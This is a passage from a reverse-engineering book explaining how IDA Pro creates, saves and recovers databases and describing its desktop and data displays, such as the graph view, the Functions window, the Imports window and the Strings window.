window (discussed further in Chapter 5). Finally, the .til file is used to store

information concerning local type definitions specific to a given database.

The formats of each of these files are proprietary to IDA, and they are not

easily edited outside of the IDA environment.

For convenience, these four files are archived, and optionally compressed,

into a single IDB file whenever you close your current project. When people

refer to an IDA database, they are typically referring to the IDB file. An uncom-

pressed database file is usually 10 times the size of the original input binary

file. When the database is closed properly, you should never see files with

.id0, .id1, .nam, or .til extensions in your working directories. Their presence

often indicates that a database was not closed properly (for example, when

IDA crashes) and that the database may be corrupt.

It is important to understand that once a database has been created for

a given executable, IDA no longer requires access to that executable unless

you intend to use IDA’s integrated debugger to debug the executable itself.

From a security standpoint, this is a nice feature. For instance, when you are

analyzing a malware sample, you can pass the associated database among

LOADER WARNINGS

Once a loader begins to analyze a file, it may encounter circumstances that require

additional user input in order to complete the loading process. One example of this

occurs with PE files that have been created with PDB debugging information. If IDA

determines that a Program Database (PDB) file may exist, you will be asked whether

you want IDA to locate and to process the corresponding PDB file as shown in this

message:

IDA Pro has determined that the input file was linked with debug

information. Do you want to look for the corresponding PDB file at

the local symbol store and the Microsoft Symbol Server?

A second example of a loader-generated informational message occurs with

obfuscated programs such as malware. Obfuscation techniques often play fast

and loose with file format specifications, which can cause problems for loaders

expecting well-structured files. Knowing this, the PE loader performs some validation

on import tables, and if the import tables do not seem to be formatted according to

convention, IDA will display the following message:

The imports segment seems to be destroyed. This MAY mean that the

file was packed or otherwise modified in order to make it more

difficult to analyze. If you want to see the imports segment in the

original form, please reload it with the ‘make imports section’

checkbox cleared.

Examples of this error and how to deal with it will be covered in Chapter 21.

50 Chapter 4

analysts without passing along the malicious executable itself. There are no

known cases in which an IDA database has been used as an attack vector for

malicious software.

At its heart, IDA is nothing more than a database application. New

databases are created and populated automatically from executable files.

The various displays that IDA offers are simply views into the database that

reveal information in a format useful to the software reverse engineer. Any

modifications that users make to the database are reflected in the views and

saved with the database, but these changes have no effect on the original

executable file. The power of IDA lies in the tools it contains to analyze and

manipulate the data within the database.

IDA Database Creation

Once you have chosen a file to analyze and specified your options, IDA ini-

tiates the creation of a database. For this process, IDA turns control over to

the selected loader module, whose job it is to load the file from disk, parse

any file-header information that it may recognize, create various program

sections containing either code or data as specified in the file’s headers, and,

finally, identify specific entry points into the code before returning control

to IDA. In this regard, IDA loader modules behave much as operating system

loaders behave. The IDA loader will determine a virtual memory layout

based on information contained in the program file headers and configure

the database accordingly.

Once the loader has finished, the disassembly engine within IDA takes

over and begins passing one address at a time to the selected processor

module. The processor module’s job is to determine the type of instruction

located at that address, the length of the instruction at that address, and the

location(s) at which execution can continue from that address (e.g., is the

current instruction sequential or branching?). When IDA is comfortable that

it has found all of the instructions in the file, it makes a second pass through

the list of instruction addresses and asks the processor module to generate the

assembly language version of each instruction for display.

Following this disassembly, IDA automatically conducts additional analysis

of the binary file to extract additional information likely to be useful to the

analyst. Users can expect to find some or all of the following information

incorporated into the database once IDA completes its initial analysis:

Compiler identification

It is often useful to know what compiler was used to build a piece of

software. Identifying the compiler that was used can help us understand

function-calling conventions used in a binary as well as determine what

libraries the binary may be linked with. When a file is loaded, IDA attempts

to identify the compiler that was used to create the input file. If the

compiler can be identified, the input file is scanned for sequences of

boilerplate code known to be used by that compiler. Such functions are

color coded in an effort to reduce the amount of code that needs to be

analyzed.

Getting Started with IDA 51

Function argument and local variable identification

Within each identified function (addresses that are targets of call

instructions), IDA performs a detailed analysis of the behavior of the

stack pointer register in order to both recognize accesses to variables

located within the stack and understand the layout of the function’s

stack frame.4 Names are automatically generated for such variables based

on their use as either local variables within the function or as arguments

passed into the function as part of the function call process.

Datatype information

Utilizing knowledge of common library functions and their required

parameters, IDA adds comments to the database to indicate the locations

at which parameters are passed into these functions. These comments

save the analyst a tremendous amount of time by providing information

that would otherwise need to be retrieved from various application pro-

gramming interface (API) references.

Closing IDA Databases

Any time you close a database, whether you are closing IDA altogether or

simply switching to a different database, you are presented with the Save

Database dialog, as shown in Figure 4-6.

Figure 4-6: The Save Database dialog

If this is the initial save of a newly created database, the new database file-

name is derived from the input filename by replacing the input extension

with the .idb extension (e.g., example.exe yields a database named example.idb).

When the input file has no extension, .idb is appended to form the name of

the database (e.g., httpd yields httpd.idb). The available save options and their

associated implications are summarized in the following list:

Don’t pack database

This option simply flushes changes to the four database component files

and closes the desktop without creating an IDB file. This option is not

recommended when closing your databases.

4. Stack frames are discussed further in Chapter 6.

52 Chapter 4

Pack database (Store)

Selecting the Store option results in the four database component files

being archived into a single IDB file. Any previous IDB will be overwritten

without confirmation. No compression is used with the Store option.

Once the IDB file has been created, the four database component files

are deleted.

Pack database (Deflate)

The Deflate option is identical to the Store option, with the exception

that the database component files are compressed within the IDB

archive.

Collect garbage

Requesting garbage collection causes IDA to delete any unused memory

pages from the database prior to closing it. Select this option in conjunc-

tion with Deflate in order to create the smallest possible IDB file. This

option is not generally required unless disk space is at a premium.

DON’T SAVE the database

You may wonder why anyone would choose not to save his work. It turns

out that this option is the only way to discard changes that you have made

to a database since the last time it was saved. When this option is selected,

IDA simply deletes the four database component files and leaves any

existing IDB file untouched. Using this option is as close as you will get

to an undo or revert capability while using IDA.

Reopening a Database

Granted, reopening an existing database doesn’t involve rocket science,5 so

you may be wondering why this topic is covered at all. Under ordinary cir-

cumstances, returning to work on an existing database is as simple as select-

ing the database using one of IDA’s file-opening methods. Database files

open much faster the second (and subsequent) time around because there

is no analysis to perform. As an added bonus, IDA restores your IDA desktop

to the same state it was in at the time it was closed.

Now for the bad news. Believe or not, IDA crashes on occasion. Whether

because of a bug in IDA itself or because of a bug in some bleeding-edge

plug-in you have installed, crashes leave open databases in a potentially cor-

rupt state. Once you restart IDA and attempt to reopen the affected data-

base, you are likely to see one of the dialogs shown in Figures 4-7 and 4-8.

Figure 4-7: Database Restore dialog

5. Unless you happen to be opening rocket_science.idb.

Getting Started with IDA 53

When IDA crashes, there is no opportunity for IDA to close the active

database, and the intermediate database files do not get deleted. If this was

not the first time that you were working with a particular database, you may

have a situation in which both an IDB file and potentially corrupt intermedi-

ate files are present at the same time. The IDB file represents the last-known

good state of the database, while the intermediate files contain any changes

that may have been made since the last save operation. In this case, you will

be offered the choice to revert to the saved version or resume use of the open,

potentially corrupt version, as shown in Figure 4-7. Choosing Continue with

Unpacked Base by no means guarantees that you will recover your work. The

unpacked database is probably in an inconsistent state, which will prompt

IDA to offer the dialog shown in Figure 4-8. In this case, IDA itself recom-

mends that you consider restoring from the packed data, so consider yourself

warned if you opt to go with a repaired database.

Figure 4-8: Database Repair dialog

When an active database has never been saved, thus leaving only inter-

mediate files present at the time of the crash, IDA offers the repair option in

Figure 4-8 as soon as you try to open the original executable file again.

Introduction to the IDA Desktop

Given the amount of time you are likely to spend staring at your IDA desktop,

you will want to spend some time familiarizing yourself with its various compo-

nents. Figure 4-9 shows an overview of a default IDA desktop. The behavior

of the desktop during file analysis is discussed in the following section.

Areas of interest in this introductory view include the following:

1. The toolbar area X contains tools corresponding to the most commonly

used IDA operations. Toolbars are added to and removed from the

desktop using the ViewToolbars command. Using drag-and-drop, you

can reposition each of the toolbars to suit your needs. Figure 4-9 shows

IDA’s basic mode toolbar with a single row of tool buttons. An advanced

mode toolbar is available using ViewToolbarsAdvanced mode. The

Advanced mode toolbars contain three full rows of tool buttons.

54 Chapter 4

Figure 4-9: The IDA desktop

2. The horizontal color band is IDA’s overview navigator Y, also called the

navigation band. The navigation band presents a linear view of the address

space of the loaded file. By default, the entire address range of the binary

is represented. You can zoom in and out of the address range by right-

clicking anywhere within the navigation band and selecting one of the

available zoom options. Different colors represent different types of file

content, such as data or code. A small current position indicator (yellow by

default) points at the navigation band address that corresponds to the

current address range being displayed in the disassembly window. Hover-

ing the mouse cursor over any portion of the navigation band yields a tool

tip that describes that location in the binary. Clicking the navigation band

jumps the disassembly view to the selected location within the binary. The

colors used in the navigation band can be customized using the Options

Colors command. Dragging the navigation band away from the IDA

desktop yields a detached Overview Navigator, as shown in Figure 4-10.

Also shown in Figure 4-10 is the current position indicator (the half-

length, downward-facing arrow to the left of location X) and a color key

identifying the file content by functional groups.

Figure 4-10: The Overview Navigator

Getting Started with IDA 55

3. Coming back to Figure 4-9, tabs Z are provided for each of the currently

open data displays. Data displays contain information extracted from the

binary and represent the various views into the database. The majority

of your analysis work is likely to take place through interaction with the

available data displays. Figure 4-9 shows three of the available data dis-

plays: IDA-View, Functions, and Graph Overview. Additional data dis-

plays are available via the ViewOpen Subviews menu, and this menu

is also used to restore any displays that have been closed, whether on

purpose or inadvertently.

4. The disassembly view [ is the primary data display. Two display styles are

available for the disassembly view: graph view (default) and listing view.

In graph view, IDA displays a flowchart-style graph of a single function at

any given time. When this is combined with the graph overview, you can

gain an understanding of the flow of the function using a visual break-

down of the function’s structure. When the IDA-View window is active,

the spacebar toggles between graph view–style and listing-style displays.

If you wish to make listing view your default, you must uncheck Use

graph view by default on the Graph tab via the OptionsGeneral menu,

as shown in Figure 4-11.

Figure 4-11: IDA graph options

5. In graph view, it is seldom possible to fit the entire graph of a function

into the display area at one time. The graph overview \, present only

when graph view is active, provides a zoomed-out snapshot of the basic

graph structure. A dotted rectangle indicates the current display within

the graph view. Clicking within the graph overview repositions the graph

view accordingly.

56 Chapter 4

6. The Output window ] is where you can expect to find any informational

messages generated by IDA. Here you will find status messages concern-

ing the progress of the file-analysis phase, along with any error mes-

sages resulting from user-requested operations. The Output window

roughly equates to a console output device.

7. The Functions window ^ rounds out the default IDA display windows

and will be discussed further in Chapter 5.

Desktop Behavior During Initial Analysis

A tremendous amount of activity takes place within the IDA desktop during

the initial autoanalysis of a newly opened file. You can gain an understanding

of this analysis by observing various desktop displays during the analysis pro-

cess. Desktop activity you may observe includes the following:

zProgress messages printed to the Output window

zInitial location and disassembly output generated for the disassembly

window

zInitial population of the Functions window, followed by periodic updates

as the analysis progresses

zTransformation of the navigation band as new areas of the binary are

recognized as code and data, blocks of code are further recognized as

functions, and, finally, functions are recognized specifically as library

code using IDA’s pattern-matching techniques

zThe current position indicator traversing the navigation band to show

the regions currently being analyzed

The following output is representative of messages generated by IDA

during the initial analysis of a newly opened binary file. Notice that the

messages form a narrative of the analysis process and offer insight into the

sequence of operations performed by IDA during that analysis.

Loading file 'C:\IdaBook\ch4_example.exe' into database...

Detected file format: Portable executable for 80386 (PE)

0. Creating a new segment (00401000-0040C000) ... ... OK

1. Creating a new segment (0040C000-0040E000) ... ... OK

2. Creating a new segment (0040E000-00411000) ... ... OK

Reading imports directory...

3. Creating a new segment (0040C120-0040E000) ... ... OK

Plan FLIRT signature: Microsoft VisualC 2-10/net runtime

autoload.cfg: vc32rtf.sig autoloads mssdk.til

Assuming __cdecl calling convention by default

main() function at 401070, named "_main"

Marking typical code sequences...

Flushing buffers, please wait...ok

File 'C:\IdaBook\ch4_example.exe' is successfully loaded into the database.

Compiling file 'C:\Program Files\IdaPro\idc\ida.idc'...

Getting Started with IDA 57

Executing function 'main'...

Compiling file 'C:\Program Files\IdaPro\idc\onload.idc'...

Executing function 'OnLoad'...

IDA is analysing the input file...

X You may start to explore the input file right now.

------------------------------------------------------------------------------

Python 2.6.5 (r265:79096, Mar 19 2010, 21:48:26) [MSC v.1500 32 bit (Intel)]

IDAPython v1.4.2 final (serial 0) (c) The IDAPython Team

<idapython@googlegroups.com>

------------------------------------------------------------------------------

Using FLIRT signature: Microsoft VisualC 2-10/net runtime

Propagating type information...

Function argument information has been propagated

Y The initial autoanalysis has been finished.

Two particularly helpful progress messages are You may start to explore

the input file right now X and The initial autoanalysis has been finished

Y. The first message informs you that IDA has made enough progress with

its analysis that you can begin navigating through the various data displays.

Navigating does not imply changing, however, and you should wait to make

any changes to the database until the analysis phase has been completed. If

you attempt to change the database prior to completion of the analysis phase,

the analysis engine may come along later and modify your changes further,

or you may even prevent the analysis engine from doing its job correctly. The

second of these messages, which is fairly self-explanatory, indicates that you

can expect no more automatic changes to take place in the desktop data dis-

plays. At this point it is safe to make any changes you like to the database.

IDA Desktop Tips and Tricks

IDA offers a tremendous amount of information, and its desktop can become

cluttered. Here are some tips for making the best use of your desktop:

zThe more screen real estate you dedicate to IDA, the happier you will be.

Use this fact to justify the purchase of a king-size monitor (or two)!

zDon’t forget the ViewOpen Subviews command as a means of restoring

data displays that you have inadvertently closed.

zThe WindowsReset Desktop command offers a useful way to quickly

restore your desktop to its original layout.

zUtilize the WindowsSave Desktop command to save a current layout of

desktop configurations that you find particularly useful. The Windows

Load Desktop command is used to quickly revert to a saved layout.

zThe only window for which the display font can be changed is the

Disassembly window (either graph or listing view). Fonts are set using

the OptionsFont command.

58 Chapter 4

Reporting Bugs

As with any piece of software, IDA has been known to contain an occasional

bug, so what can you expect from Hex-Rays if you think you have found a

bug in IDA itself? First, Hex-Rays has one of the most responsive support sys-

tems you can will ever deal with. Second, don’t be surprised if you hear back

from Ilfak himself within a day of submitting a support request.

Two methods are available for submitting bug reports. You can send

email to support@hex-rays.com, or if you prefer not to use email, you may post

to the Bug Reports forum on the Hex-Rays bulletin boards. In either case,

you should both verify that you can reproduce your bug and be prepared to

provide Hex-Rays with a copy of the database file involved with the problem.

Recall that Hex-Rays only provides SDK support for an additional fee. For

bugs related to a plug-in that you have installed, you will need to contact the

plug-in’s author. For bugs related to a plug-in that you are developing, you

will need to take advantage of the support forums available for IDA users and

hope for a helpful response from a fellow user.

Summary

Familiarity with the IDA workspace will greatly enhance your experience with

IDA. Reverse engineering binary code is difficult enough without having to

struggle with your tools. The options that you choose during the initial load-

ing phase and the subsequent autoanalysis performed by IDA set the stage

for all of the analysis that you will do later. At this point you may be content

with the work that IDA has accomplished on your behalf, and for simple

binaries, autoanalysis may be all that you need. On the other hand, if you

wonder what puts the interactive in IDA, you are now ready to dive deeper

into the functionality of IDA’s many data displays. In the coming chapters

you will be introduced to each of the primary displays, the circumstances

under which you will find each one useful, and how to utilize these displays

to enhance and update your databases.

JMP

EBP

SUB

IDA DATA DISPLAYS

At this point you should have some confi-

dence loading binaries into IDA and letting

IDA work its magic while you sip your favorite

beverage. Once IDA’s initial analysis phase is com-

plete, it is time for you to take control. One of the best

ways for you to familiarize yourself with IDA’s displays is

simply to browse around the various tabbed subwindows that IDA populates

with data about your binary. The efficiency and effectiveness of your reverse

engineering sessions will improve as your comfort level with IDA increases.

Before we dive into the major IDA subdisplays, it is useful to cover a few

basic rules concerning IDA’s user interface:

There is no undo in IDA.

If something unexpected happens to your database as a result of an

inadvertent keypress, you are on your own to restore your displays to

their previous states.

60 Chapter 5

Almost all actions have an associated menu item, hotkey, and toolbar button.

Remember, the IDA toolbar is highly configurable, as is the mapping of

hotkeys to menu actions.

IDA offers good, context-sensitive menu actions in response to right mouse

clicks.

While these menus do not offer an exhaustive list of permissible actions

at a given location, they do serve as good reminders for the most common

actions you will be performing.

With these facts in mind, let’s begin our coverage of the principal IDA

data displays.

The Principal IDA Displays

In its default configuration, IDA creates seven (as of version 6.1) display win-

dows during the initial loading-and-analysis phase for a new binary. Each of

these display windows is accessible via a set of title tabs displayed immediately

beneath the navigation band (shown previously in Figure 4-9). The three

immediately visible windows are the IDA-View window, the Functions window,

and the Output window. Whether or not they are open by default, all of the

windows discussed in this chapter can be opened via the ViewOpen Sub-

views menu. Keep this fact in mind, as it is fairly easy to inadvertently close

the display windows.

The ESC key is one of the more useful hotkeys in all of IDA. When the

disassembly window is active, the ESC key functions in a manner similar to

a web browser’s back button and is therefore very useful in navigating the

disassembly display (navigation is covered in detail in Chapter 6). Unfor-

tunately, when any other window is active, the ESC key serves to close the win-

dow. Occasionally, this is exactly what you want. At other times, you will

immediately wish you had that closed window back.

The Disassembly Window

Also known as the IDA-View window, the disassembly window will be your

primary tool for manipulating and analyzing binaries. Accordingly, it is

important that you become intimately familiar with the manner in which

information is presented in the disassembly window.

Two display formats are available for the disassembly window: the default

graph-based view and a text-oriented listing view. Most IDA users tend to pre-

fer one view over the other, and the view that better suits your needs is often

determined by how you prefer to visualize a program’s flow. If you prefer to

use the text listing view as your default disassembly view, you can change the

default by using the OptionsGeneral dialog to turn off Use graph view by

default on the Graph tab. Whenever the disassembly view is active, you can

easily switch between graph and listing views at any time by using the spacebar.

IDA Data Displays 61

IDA Graph View

Figure 5-1 shows a very simple function displayed in graph view. Graph views

are somewhat reminiscent of program flowcharts in that a function is broken

up into basic blocks1 so you can visualize the function’s control flow from

one block to another.

Figure 5-1: IDA graph view

1. A basic block is a maximal sequence of instructions that executes, without branching, from

beginning to end. Each basic block therefore has a single entry point (the first instruction in

the block) and a single exit point (the last instruction in the block). The first instruction in a

basic block is often the target of a branching instruction, while the last instruction in a basic

block is often a branch instruction.

62 Chapter 5

Onscreen, you’ll notice IDA uses different colored arrows to distinguish

various types of flows2 between the blocks of a function. Basic blocks that ter-

minate with a conditional jump generate two possible flows depending on

the condition being tested: the Yes edge arrow (yes, the branch is taken) is

green by default, and the No edge arrow (no, the branch is not taken) is red

by default. Basic blocks that terminate with only one potential successor block

utilize a Normal edge (blue by default) to point to the next block to be executed.

In graph mode, IDA displays one function at a time. For users with a

wheel mouse, graph zooming is possible using the CTRL-wheel combination.

Keyboard zoom control requires CTRL-+ to zoom in or CTRL-− to zoom out

(using the + and − keys on the numeric keypad). Large or complex functions

may cause the graph view to become extremely cluttered, making the graph

difficult to navigate. In such cases, the Graph Overview window (see Figure 5-2)

is available to provide some situational awareness. The overview window always

displays the complete block structure of the graph along with a dashed frame

that indicates the region of the graph currently being viewed in the disas-

sembly window. The dashed frame can be dragged across the overview window

to rapidly reposition the graph view to any desired location on the graph.

Figure 5-2: The Graph Overview window

With the graph display, there are several ways that you can manipulate

the view to suit your needs:

Panning

First, in addition the using the Graph Overview window to rapidly

reposition the graph, you can also reposition the graph by clicking and

dragging the background of the graph view.

2. IDA uses the term flow to indicate how execution can continue from a given instruction. A

normal (also called ordinary) flow indicates default sequential execution of instructions. A jump

flow indicates that the current instruction jumps (or may jump) to a nonsequential location. A

call flow indicates that the current instruction calls a subroutine.

IDA Data Displays 63

HEY, ISN’T SOMETHING MISSING HERE?

When using graph view, it may seem as if less information is available to you about

each line of the disassembly. The reason for this is that IDA chooses to hide many of

the more traditional pieces of information about each disassembled line (such as

virtual address information) in order to minimize the amount of space required to

display each basic block. You can choose to display additional information with

each disassembly line by choosing among the available disassembly line parts

accessible via the Disassembly tab from OptionsGeneral. For example, to add

virtual addresses to each disassembly line, we enable line prefixes, transforming the

graph from Figure 5-1 into the graph shown in Figure 5-3.

Figure 5-3: Graph view with line prefixes enabled

64 Chapter 5

Rearranging blocks

Individual blocks within the graph can be dragged to new positions by

clicking the title bar for the desired block and dragging it to a new

position. Beware that IDA performs only minimal rerouting of any edges

associated with a moved block. You can manually reroute edges by drag-

ging vertices to new locations. New vertices can be introduced into an

edge by double-clicking the desired location within an edge while

holding the SHIFT key. If at any point you find yourself wishing to revert

to the default layout for your graph, you can do so by right-clicking the

graph and choosing Layout Graph.

Grouping and collapsing blocks

Blocks can be grouped, either individually or together with other blocks,

and collapsed to reduce the clutter in the display. Collapsing blocks is a

particularly useful technique for keeping track of blocks that you have

already analyzed. You can collapse any block by right-clicking the block’s

title bar and selecting Group Nodes.

Creating additional disassembly windows

If you ever find yourself wanting to view graphs of two functions simulta-

neously, all you need to do is open another disassembly window using

ViewsOpen SubviewsDisassembly. The first disassembly window

opened is titled IDA View-A. Subsequent disassembly windows are titled

IDA View-B, IDA View-C, and so on. Each disassembly is independent of

the other, and it is perfectly acceptable to view a graph in one window

while viewing a text listing in another or to view three different graphs

in three different windows.

Keep in mind that your control over the view extends beyond just these

examples. Additional IDA graphing capabilities are covered in Chapter 9,

while more information on the manipulation of IDA’s graph view is available

in the IDA help file.

IDA Text View

The text-oriented disassembly window is the traditional display used for

viewing and manipulating IDA-generated disassemblies. The text display

presents the entire disassembly listing of a program (as opposed to a single

function at a time in graph mode) and provides the only means for viewing

the data regions of a binary. All of the information available in the graph dis-

play is available in the text display in one form or another.

Figure 5-4 shows the text view listing of the same function shown in Fig-

ures 5-1 and 5-3. The disassembly is presented in linear fashion, with virtual

addresses displayed by default. Virtual addresses are typically displayed in a

[SECTION NAME]:[VIRTUAL ADDRESS] format such as .text:004011C1.

IDA Data Displays 65

Figure 5-4: The IDA text view

The left portion of the display, seen at X, is called the arrows window

and is used to depict nonlinear flow within a function. Solid arrows represent

unconditional jumps, while dashed arrows represent conditional jumps. When

a jump (conditional or unconditional) transfers control to an earlier address

in the program, a heavy weighted line (solid or dashed) is used. Such reverse

flow in a program often indicates the presence of a loop. In Figure 5-4, a

loop arrow flows from address 004011CF to 004011C5.

The declarations at Y (also present in graph view) represent IDA’s best

estimate concerning the layout of the function’s stack frame.3 IDA computes

the structure of a function’s stack frame by performing detailed analysis of the

behavior of the stack pointer and any stack frame pointer used within a func-

tion. Stack displays are discussed further in Chapter 6.

The comments (a semicolon introduces a comment) at Z are cross-

references. In this case we see code cross-references (as opposed to data cross-

references), which indicate that another program instruction transfers control

to the location containing the cross-reference comment. Cross-references are

the subject of Chapter 9.

For the remainder of the book we will primarily utilize the text display

for examples. We’ll use the graph display only in cases where it may provide

significantly more clarity. In Chapter 7 we will cover the specifics of manipu-

lating the text display in order to clean up and annotate a disassembly.

3. A stack frame (or activation record) is a block of memory, allocated in a program’s runtime stack,

that contains both the parameters passed into a function and the local variables declared within

the function. Stack frames are allocated upon entry into a function and released as the function

exits. Stack frames are discussed in more detail in Chapter 6.

66 Chapter 5

The Functions Window

The Functions window is used to list every function that IDA has recognized

in the database. A Functions window entry might look like the following:

malloc .text 00BDC260 00000180 R . . . B . .

This particular line indicates that the malloc function can be found in the

.text section of the binary at virtual address 00BDC260, is 384 bytes (hex 180)

long, returns to the caller (R), and uses the EBP register (B) to reference its

local variables. Flags used to describe a function (such as R and B above) are

described in IDA’s built-in help file (or by right-clicking a function and

choosing Properties. The flags are shown as editable checkboxes in the

resulting Properties dialog).

As with other display windows, double-clicking an entry in the Functions

window causes the disassembly window to jump to the location of the selected

function.

The Output Window

The Output window at the bottom of the IDA workspace rounds out the

default set of windows that are visible when a new file is opened. The Ouput

window serves as IDA’s output console and is the place to look for information

on tasks IDA is performing. When a binary is first opened, for example,

messages are generated to indicate both what phase of analysis IDA is in at

any given time and what actions IDA is carrying out to create the new database.

As you work with a database, the Output window is used to output the status

of various operations that you perform. The contents of the Output window

can be copied to the system clipboard or cleared entirely by right-clicking

anywhere in the window and selecting the appropriate operation. The Output

window will often be the primary means by which you display output from

any scripts and plug-ins that you develop for IDA.

Secondary IDA Displays

In addition to the disassembly, Functions, and Output windows, IDA opens a

number of other tabbed windows on your IDA desktop. These tabs are present

just under the navigation band (see Z in Figure 4-9). These windows are

used to provide alternate or specialized views into the database. The utility

of these displays depends on both the characteristics of the binary you are

analyzing and your skill with IDA. Several of these windows are sufficiently

specialized to require more detailed coverage in later chapters.

IDA Data Displays 67

The Hex View Window

Hex View is something of a misnomer in this case, as the IDA Hex View win-

dow can be configured to display a variety of formats and doubles as a hex

editor. By default, the Hex View window provides a standard hex dump of

the program content with 16 bytes per line and ASCII equivalents displayed

alongside. As with the disassembly window, several hex views can be opened

simultaneously. The first Hex window is titled Hex View-A, the second Hex

View-B, the next Hex View-C, and so on. By default, the first Hex window is

synchronized with the first disassembly window. When a disassembly view

is synchronized with a hex view, scrolling in one window causes the other

window to scroll to the same location (same virtual address). In addition,

when an item is selected in disassembly view, the corresponding bytes are

highlighted in hex view. In Figure 5-5, the disassembly view cursor is posi-

tioned at address 0040108C, a call instruction, causing the five bytes that make

up the instruction to be highlighted in the Hex window.

Figure 5-5: Synchronized hex and disassembly views

Also shown in Figure 5-5 is the hex display context menu, available

when you right-click anywhere within the hex display. This context menu is

where you may specify with which, if any, disassembly view you would like to

synchronize a particular hex display. Deselecting the synchronization option

allows a Hex window to be scrolled independently of any disassembly window.

Selecting the Edit menu option turns the Hex View into a hex editor. Once

you are finished editing, you must either commit or cancel your changes in

order to return to view mode. The Data Format menu item allows you to

select from a variety of display formats such as 1-, 2-, 4-, or 8-byte hexadeci-

mal; signed decimal; or unsigned decimal integers and various floating point

formats. The Columns menu option allows you to change the number of col-

umns used in the display, and the Text option allows you to turn the text

dump on and off.

68 Chapter 5

In some cases you may find that the Hex window shows nothing but

question marks. This is IDA’s way of telling you that it has no idea what values

might occupy a given virtual address range. Such is the case when a program

contains a bss4 section, which typically occupies no space within a file but is

expanded by the loader to accommodate the program’s static storage

requirements.

The Exports Window

The Exports window lists the entry points into a file. These include the pro-

gram’s execution entry point, as specified in its header section, along with

any functions and variables that the file exports for use by other files. Exported

functions are commonly found in shared libraries such as Windows DLL files.

Exported entries are listed by name, virtual address, and, if applicable, by

ordinal number.5 For executable files, the Exports window always contains at

least one entry: the program’s execution entry point. IDA names this entry

point start. A typical Exports window entry follows:

LoadLibraryA 7C801D77 578

As with many of the other IDA windows, double-clicking an entry in the

Exports window will jump the disassembly window to the address associated

with that entry. The Exports window offers functionality available in command-

line tools such as objdump (-T), readelf (-s), and dumpbin (/EXPORTS).

The Imports Window

The Imports window is a counterpart to the Exports window. It lists all func-

tions that are imported by the binary being analyzed. The Imports window is

relevant only when a binary makes use of shared libraries. Statically linked

binaries have no external dependencies and therefore no imports. Each entry

in the Imports window lists the name of an imported item (function or data)

and the name of the library that contains that item. Since the code for an

imported function resides in a shared library, the addresses listed with each

entry refer to the virtual address of the associated import table entry.6 An

example of an Import window entry is shown here:

0040E108 GetModuleHandleA KERNEL32

4. A bss section is created by a compiler to house all of a program’s uninitialized, static variables.

Since no initial value is assigned to these variables, there is no need to allocate space for them

in the program’s file image, so the section’s size is noted in one of the program’s headers.

When the program is executed, the loader allocates the required space and initializes the entire

block to zero.

5. An export ordinal number may be used in a shared library to make a function accessible by

number rather than name. The use of ordinals can speed the address lookup process and allow

programmers to hide the names of their functions. Export ordinals are used in Windows DLLs.

6. An import table provides space for a loader to store addresses of imported functions once the

required libraries have been loaded and the addresses of those functions are known. A single

import table entry holds the address of one imported function.

IDA Data Displays 69

Double-clicking this import would jump the disassembly window to

address 0040E108. The contents of this memory location in hex view would

be ?? ?? ?? ??. IDA is a static analysis tool, and it has no way to know what

address will be entered into this memory location when the program is exe-

cuted. The Imports window also offers functionality available in command-

line tools such as objdump (-T), readelf (-s), and dumpbin (/IMPORTS).

An important point to remember about the Imports window is that it

displays only the symbols that a binary wants handled automatically by the

dynamic loader. Symbols that a binary chooses to load on its own using a

mechanism such as dlopen/dlsym or LoadLibrary/GetProcAddress will not be

listed in the Imports window.

The Structures Window

The Structures window is used to display the layout of any complex data struc-

tures, such as C structs or unions, that IDA determines are in use within a

binary. During the analysis phase, IDA consults its extensive library of function-

type signatures in an attempt to match function parameter types to memory

used within the program. The Structures window shown in Figure 5-6 indicates

that IDA believes the program uses the sockaddr7 data structure.

Figure 5-6: The Structures window

There are many possible reasons why IDA may have arrived at this con-

clusion. One such reason might be that IDA has observed a call to the C library

connect8 function to establish a new network connection. Double-clicking the

name of a data structure (sockaddr in this case) causes IDA to expand the

structure, and this allows you to see the detailed layout of the structure,

including individual field names and sizes.

The two primary uses for the Structures window are (1) to provide a

ready reference for the layout of standard data structures and (2) to provide

you with a means to create your own data structures for use as memory layout

templates when you discover custom data structures within a program. Struc-

ture definition and the application of structures within disassemblies are cov-

ered in more detail in Chapter 8.

7. A sockaddr structure is a datatype in the C standard library often used to represent an

endpoint in a network connection. A sockaddr variable can be used to hold an IP address and

port number as part of the process of establishing a TCP connection to a remote computer.

8. int connect(int sockfd, const struct sockaddr *serv_addr, socklen_t addrlen);

70 Chapter 5

The Enums Window

The Enums window is somewhat similar to the Structures window. When IDA

detects the use of a standard enumerated datatype (C enum), that datatype will

be listed in the Enums window. You can make your disassemblies far more

readable by using enums in place of integer constants. Like the Structures

window, the Enums window offers facilities for defining your own enumerated

types that you can use with your disassembled binaries.

Tertiary IDA Displays

The last windows that we will discuss are those that IDA does not open by

default. Each of these windows is available via ViewOpen Subviews, but

they tend to provide information to which you may not require immediate

access and are thus initially kept out of the way.

The Strings Window

The Strings window is the built-in IDA equivalent of the strings utility and

then some. In IDA versions 5.1 and earlier, the Strings window was open as

part of the default desktop; however, with version 5.2, the Strings window

is no longer open by default, though it remains available via ViewOpen

SubviewsStrings.

The purpose of the Strings window is to display a list of strings extracted

from a binary along with the address at which each string resides. Like double-

clicking names in the Names window, double-clicking any string listed in the

Strings window causes the disassembly window to jump to the address of the

selected string. When used with cross-references (Chapter 9), the Strings

window provides the means to rapidly spot an interesting string and to track

back to any location in the program that references that string. For example,

you might see the string SOFTWARE\Microsoft\Windows\CurrentVersion\Run

listed and wonder why an application is referencing this particular key within

the Windows registry. As you will see in the following chapter, navigating to

the program location that references this string takes only four clicks. Under-

standing the operation of the Strings window is essential to using it effectively.

IDA does not permanently store the strings it extracts from a binary. There-

fore, every time the Strings window is opened, the entire database must be

scanned or rescanned for string content. String scanning is performed in

accordance with the settings of the Strings window, and you can access these

settings by right-clicking within the Strings window and selecting Setup. As

shown in Figure 5-7, the Setup Strings window is used to specify the types of

strings that IDA should scan for. The default string type that IDA scans for

is a C-style, null-terminated, 7-bit, ASCII string of at least five characters in

length.

IDA Data Displays 71

Figure 5-7: The Setup Strings window

If you expect to encounter anything other than C-style strings, you should

reconfigure the Setup Strings window to choose the appropriate string type

to search for. For example, Windows programs often make use of Unicode

strings, while Borland Delphi binaries use Pascal-style strings with a 2-byte

length. Every time you close the Setup Strings window by clicking OK, IDA

will rescan the database for strings in accordance with the new settings. Two

setup options deserve special mention:

Display only defined strings

This option restricts the Strings window to displaying only named string

data items that have been automatically created by IDA or manually cre-

ated by the user. With this option selected, all other options are disabled,

and IDA will not automatically scan for additional string content.

Ignore instructions/data definitions

This option causes IDA to scan for strings across instruction and existing

